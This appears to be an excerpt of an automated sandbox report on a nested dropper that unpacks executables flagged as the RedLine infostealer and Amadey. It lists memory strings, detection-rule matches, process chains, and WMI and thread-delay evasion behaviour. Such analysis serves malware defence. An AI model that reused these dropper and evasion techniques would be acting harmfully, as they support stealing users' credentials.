                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: fDI32WO.exe, 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, bAS06bx.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                          Source: bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                          Source: bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                          System Summary

                          Source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPE. Matched rule: Detects RedLine infostealer. Author: ditekSHen
                          Source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPE. Matched rule: Detects RedLine infostealer. Author: ditekSHen
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPE. Matched rule: Detects RedLine infostealer. Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPED. Matched rule: Detects RedLine infostealer. Author: ditekSHen
                          Source: file.exe. Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.3.fDI32WO.exe.45dfc20.0.raw.unpack, type: UNPACKEDPE. Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.fDI32WO.exe.45dfc20.0.unpack, type: UNPACKEDPE. Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, type: UNPACKEDPE. Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, type: DROPPED. Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\file.exe. Code function: 0_2_00971F90 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, CloseHandle, ExitWindowsEx, ExitWindowsEx
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe. Code function: 1_2_001A1F90 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, CloseHandle, ExitWindowsEx, ExitWindowsEx
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe. Code function: 2_2_00A81F90 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, CloseHandle, ExitWindowsEx, ExitWindowsEx
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00973BA20_2_00973BA2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00975C9E0_2_00975C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A3BA21_2_001A3BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A5C9E1_2_001A5C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A83BA22_2_00A83BA2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A85C9E2_2_00A85C9E
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeCode function: 5_2_0502F7C85_2_0502F7C8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeCode function: 5_2_0502F3685_2_0502F368
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 642008 bytes, 2 files, at 0x2c +A "fuN31PL.exe" +A "dXL24Wx.exe", ID 1862, number 1, 26 datablocks, 0x1503 compression
                          Source: fuN31PL.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 450562 bytes, 2 files, at 0x2c +A "fDI32WO.exe" +A "cfh9400.exe", ID 1756, number 1, 21 datablocks, 0x1503 compression
                          Source: fDI32WO.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50172 bytes, 2 files, at 0x2c +A "aRe53.exe" +A "bAS06bx.exe", ID 1686, number 1, 6 datablocks, 0x1503 compression
                          Source: file.exe, 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeSection loaded: sfc.dllJump to behavior
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe 9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          Source: file.exeReversingLabs: Detection: 69%
                          Source: file.exeVirustotal: Detection: 58%
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aRe53.exe.logJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/8@0/1
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0097597D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00973FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00973FEF
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeCode function: 3_2_00007FF815F61B10 ChangeServiceConfigA,3_2_00007FF815F61B10
                          Source: bAS06bx.exe.2.dr, BrEx.csBase64 encoded string: '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
                          Source: 5.0.bAS06bx.exe.860000.0.unpack, BrEx.csBase64 encoded string: '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
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00974FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00974FE0
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_00972BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCommand line argument: Kernel32.dll1_2_001A2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCommand line argument: Kernel32.dll2_2_00A82BFB
                          Source: C:\Users\user\Desktop\file.exeAutomated click: OK
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeAutomated click: OK
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, dXL24Wx.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: file.exe, fDI32WO.exe.1.dr, fuN31PL.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: fDI32WO.exe, 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, aRe53.exe, 00000003.00000000.308600922.00000000005E2000.00000002.00000001.01000000.00000006.sdmp, aRe53.exe.2.dr
                          Source: Binary string: C:\setilikavegor\mixu76 bej yovesuwudel89 vifohe.pdb source: fuN31PL.exe, 00000001.00000003.307160395.0000000004794000.00000004.00000020.00020000.00000000.sdmp, cfh9400.exe.1.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097724D push ecx; ret 0_2_00977260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A724D push ecx; ret 1_2_001A7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A8724D push ecx; ret 2_2_00A87260
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeCode function: 3_2_00007FF815F6000B pushad ; ret 3_2_00007FF815F60029
                          Source: cfh9400.exe.1.drStatic PE information: section name: .jexose
                          Source: cfh9400.exe.1.drStatic PE information: section name: .cim
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00972F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00972F1D
                          Source: aRe53.exe.2.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00971AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeCode function: 1_2_001A1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_001A1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCode function: 2_2_00A81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00A81AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe TID: 3136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe TID: 3644Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe TID: 972Thread sleep count: 1172 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe TID: 4624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exeWindow / User API: threadDelayed 1172Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2451
